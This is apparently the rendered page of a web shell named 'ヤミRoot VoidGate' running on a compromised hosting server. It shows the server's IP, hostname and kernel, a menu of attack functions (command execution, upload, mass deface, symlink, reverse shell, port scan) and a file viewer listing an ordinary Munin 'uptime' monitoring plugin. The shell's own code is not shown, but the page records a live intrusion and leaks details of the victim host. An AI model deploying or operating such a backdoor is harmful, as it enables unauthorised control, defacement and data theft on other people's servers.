ヤミRoot VoidGate
User / IP
:
216.73.216.49
Host / Server
:
146.88.233.70 / www.dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
etc
/
munin
/
plugins
/
Viewing: uptime
#!/bin/sh # -*- sh -*- : << =cut =head1 NAME uptime - Plugin to measure uptime. =head1 NOTES Especially the average and max values on the bigger graphs (yearly) can be interesting. =head1 AUTHOR Contributed by Nicolas Salles =head1 LICENSE GPLv2 =head1 MAGIC MARKERS #%# family=auto #%# capabilities=autoconf =cut . $MUNIN_LIBDIR/plugins/plugin.sh if [ "$1" = "autoconf" ]; then echo yes exit 0 fi if [ "$1" = "config" ]; then echo 'graph_title Uptime' echo 'graph_args --base 1000 -l 0 ' echo 'graph_scale no' echo 'graph_vlabel uptime in days' echo 'graph_category system' echo 'uptime.label uptime' echo 'uptime.draw AREA' print_warning uptime print_critical uptime exit 0 fi awk '{printf "uptime.value %.2f\n",$1/86400}' /proc/uptime
Coded With 💗 by
0x6ick